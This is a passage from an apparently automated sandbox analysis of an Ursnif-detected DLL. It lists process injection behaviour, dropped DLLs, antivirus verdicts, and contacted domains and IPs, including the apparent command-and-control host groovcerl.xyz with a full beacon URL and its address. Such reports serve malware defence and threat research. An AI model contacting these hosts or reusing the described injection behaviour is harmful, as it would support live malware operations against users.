started        55 2 other processes 23->55 61 C:\Users\user\AppData\Local\...\q3xypckz.dll, PE32 27->61 dropped 42 cvtres.exe 27->42         started        63 C:\Users\user\AppData\Local\...\chv50z53.dll, PE32 30->63 dropped 44 cvtres.exe 30->44         started        121 Writes to foreign memory regions 34->121 123 Allocates memory in foreign processes 34->123 125 Modifies the context of a thread in another process (thread injection) 34->125 46 rundll32.exe 34->46         started        89 192.168.2.1 unknown unknown 38->89 48 iexplore.exe 164 38->48         started        51 iexplore.exe 35 38->51         started        53 iexplore.exe 38->53         started        57 3 other processes 38->57 file11 signatures12 process13 dnsIp14 59 conhost.exe 40->59         started        69 img.img-taboola.com 48->69 71 edge.gycpi.b.yahoodns.net 87.248.118.23, 443, 49744, 49745 YAHOO-DEBDE United Kingdom 48->71 81 9 other IPs or domains 48->81 73 assets.onestore.ms 51->73 75 consentdeliveryfd.azurefd.net 51->75 77 ajax.aspnetcdn.com 51->77 79 groovcerl.xyz 162.0.213.230, 49765, 49766, 49767 ACPCA Canada 53->79 process15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            vnaSKDMnLG.dll12%VirustotalBrowse
            vnaSKDMnLG.dll100%AviraTR/AD.Ursnif.AD

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            1.2.regsvr32.exe.4a80000.2.unpack100%AviraHEUR/AGEN.1108168Download File

            Domains

            SourceDetectionScannerLabelLink
            tls13.taboola.map.fastly.net0%VirustotalBrowse
            groovcerl.xyz1%VirustotalBrowse
            edge.gycpi.b.yahoodns.net0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://constitution.org/usdeclar.txtC:0%Avira URL Cloudsafe
            http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
            http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
            http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
            http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://groovcerl.xyz/imaA0%Avira URL Cloudsafe
            http://%s.com0%URL Reputationsafe
            http://%s.com0%URL Reputationsafe
            http://%s.com0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://buscar.ozu.es/0%Avira URL Cloudsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://groovcerl.xyz/images/_2B9CjQr1xAViB33KLEZFl/2znYpePgiBaym/Zcv7ASeM/RH1S7KGYN6l8JiGWg4e9nXb/NQZq1SSxJi/mc5yp3cGYcmh41_2B/sgGwdOmEGgkx/5KQWfRKKgWK/Xt2u1awqIScbRf/sgOFy4dR5ErSJgERDDH7r/_2FEWj4i_2BFzqwq/_2BgPzFAK8qrY4B/dRdOEARjck/1iLUKWQnn/K.avi0%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://groovcerl.xyz/images/_2B9CjQr1xAViB33KLEZFl/2znYpePgiBaym/Zcv7ASeM/RH1S7KGYN6l8JiGWg4e9nXb/NQ0%Avira URL Cloudsafe
            http://crl.osofts/Microt00%Avira URL Cloudsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://search.yahoo.co.jp0%URL Reputationsafe
            http://search.yahoo.co.jp0%URL Reputationsafe
            http://search.yahoo.co.jp0%URL Reputationsafe
            http://buscador.terra.es/0%URL Reputationsafe
            http://buscador.terra.es/0%URL Reputationsafe
            http://buscador.terra.es/0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            contextual.media.net
            104.80.21.70
            truefalse
              high
              tls13.taboola.map.fastly.net
              151.101.1.44
              truefalseunknown
              hblg.media.net
              104.80.21.70
              truefalse
                high
                lg3.media.net
                104.80.21.70
                truefalse
                  high
                  groovcerl.xyz
                  162.0.213.230
                  truefalseunknown
                  resolver1.opendns.com
                  208.67.222.222
                  truefalse
                    high
                    edge.gycpi.b.yahoodns.net
                    87.248.118.23
                    truefalseunknown
                    www.msn.com
                    unknown
                    unknownfalse
                      high
                      srtb.msn.com
                      unknown
                      unknownfalse
                        high
                        assets.onestore.ms
                        unknown
                        unknowntrue
                          unknown
                          img.img-taboola.com
                          unknown
                          unknowntrue
                            unknown
                            ajax.aspnetcdn.com
                            unknown
                            unknownfalse
                              high
                              s.yimg.com
                              unknown
                              unknownfalse
                                high
                                web.vortex.data.msn.com
                                unknown
                                unknownfalse
                                  high
                                  cvision.media.net
                                  unknown
                                  unknownfalse
                                    high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://groovcerl.xyz/images/_2B9CjQr1xAViB33KLEZFl/2znYpePgiBaym/Zcv7ASeM/RH1S7KGYN6l8JiGWg4e9nXb/NQZq1SSxJi/mc5yp3cGYcmh41_2B/sgGwdOmEGgkx/5KQWfRKKgWK/Xt2u1awqIScbRf/sgOFy4dR5ErSJgERDDH7r/_2FEWj4i_2BFzqwq/_2BgPzFAK8qrY4B/dRdOEARjck/1iLUKWQnn/K.avifalse
                                    • Avira URL Cloud: safe
                                    unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://search.chol.com/favicon.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.mercadolivre.com.br/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.merlin.com.pl/favicon.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://search.ebay.de/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.mtv.com/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.rambler.ru/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.nifty.com/favicon.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.dailymail.co.uk/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www3.fnac.com/favicon.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                high
                                                http://buscar.ya.com/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://search.yahoo.com/favicon.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://constitution.org/usdeclar.txtC:powershell.exe, 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, control.exe, 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://https://file://USER.ID%lu.exe/updpowershell.exe, 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, control.exe, 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    low
                                                    http://www.sogou.com/favicon.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.fontbureau.com/designersexplorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://asp.usatoday.com/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://fr.search.yahoo.com/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://rover.ebay.comexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://in.search.yahoo.com/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://ocsp.pki.goog/gts1o1core0explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://search.ebay.in/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://nuget.org/nuget.exepowershell.exe, 00000016.00000002.479407325.0000020EA04B2000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://www.galapagosdesign.com/DPleaseexplorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://groovcerl.xyz/imaAexplorer.exe, 0000001E.00000000.440619372.000000000EE32000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://%s.comexplorer.exe, 0000001E.00000000.439561975.000000000DC70000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      low
                                                                      http://msk.afisha.ru/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                        high
                                                                        http://www.zhongyicts.com.cnexplorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000016.00000002.449986423.0000020E90451000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://search.rediff.com/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                            high
                                                                            http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000001E.00000000.433254432.0000000006840000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              http://www.ya.com/favicon.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                high
                                                                                http://www.etmall.com.tw/favicon.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://it.search.dada.net/favicon.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000016.00000003.389591293.0000020EA8997000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.450833084.0000020E9065E000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://search.naver.com/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.google.ru/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                    high
                                                                                    http://search.hanafos.com/favicon.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000016.00000002.450833084.0000020E9065E000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.abril.com.br/favicon.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://search.daum.net/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                        high
                                                                                        https://contoso.com/Iconpowershell.exe, 00000016.00000002.479407325.0000020EA04B2000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://search.naver.com/favicon.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                          high
                                                                                          http://search.msn.co.jp/results.aspx?q=explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.clarin.com/favicon.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                            high
                                                                                            http://buscar.ozu.es/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://kr.search.yahoo.com/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                              high
                                                                                              http://search.about.com/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                high
                                                                                                http://busca.igbusca.com.br/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://www.ask.com/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://www.priceminister.com/favicon.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000016.00000003.389591293.0000020EA8997000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.450833084.0000020E9065E000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://www.cjmall.com/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://search.centrum.cz/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.carterandcone.comlexplorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://suche.t-online.de/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://www.google.it/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://search.auction.co.kr/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://www.ceneo.pl/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.amazon.de/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://sads.myspace.com/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://busca.buscape.com.br/favicon.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://www.pchome.com.tw/favicon.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://browse.guardian.co.uk/favicon.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://google.pchome.com.tw/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.rambler.ru/favicon.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://uk.search.yahoo.com/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://espanol.search.yahoo.com/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.ozu.es/favicon.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://search.sify.com/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://openimage.interpark.com/interpark.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://search.yahoo.co.jp/favicon.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://search.ebay.com/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://www.gmarket.co.kr/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.founder.com.cn/cn/bTheexplorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://search.nifty.com/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://searchresults.news.com.au/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://groovcerl.xyz/images/_2B9CjQr1xAViB33KLEZFl/2znYpePgiBaym/Zcv7ASeM/RH1S7KGYN6l8JiGWg4e9nXb/NQexplorer.exe, 0000001E.00000000.437107057.0000000008A32000.00000004.00000001.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.google.si/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.google.cz/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://www.soso.com/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www.univision.com/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://search.ebay.it/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://crl.osofts/Microt0powershell.exe, 00000016.00000003.417318840.0000020EA8B38000.00000004.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://www.asharqalawsat.com/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://busca.orange.es/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://cnweb.search.live.com/results.aspx?q=explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://auto.search.msn.com/response.asp?MT=explorer.exe, 0000001E.00000000.439561975.000000000DC70000.00000002.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://search.yahoo.co.jpexplorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://www.target.com/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://buscador.terra.es/explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://www.typography.netDexplorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://fontfabrik.comexplorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown

                                                                                                                                                          Contacted IPs

                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                          Public

                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                          87.248.118.23
                                                                                                                                                          unknownUnited Kingdom
                                                                                                                                                          203220YAHOO-DEBDEfalse
                                                                                                                                                          63.250.47.200
                                                                                                                                                          unknownUnited States
                                                                                                                                                          22612NAMECHEAP-NETUSfalse
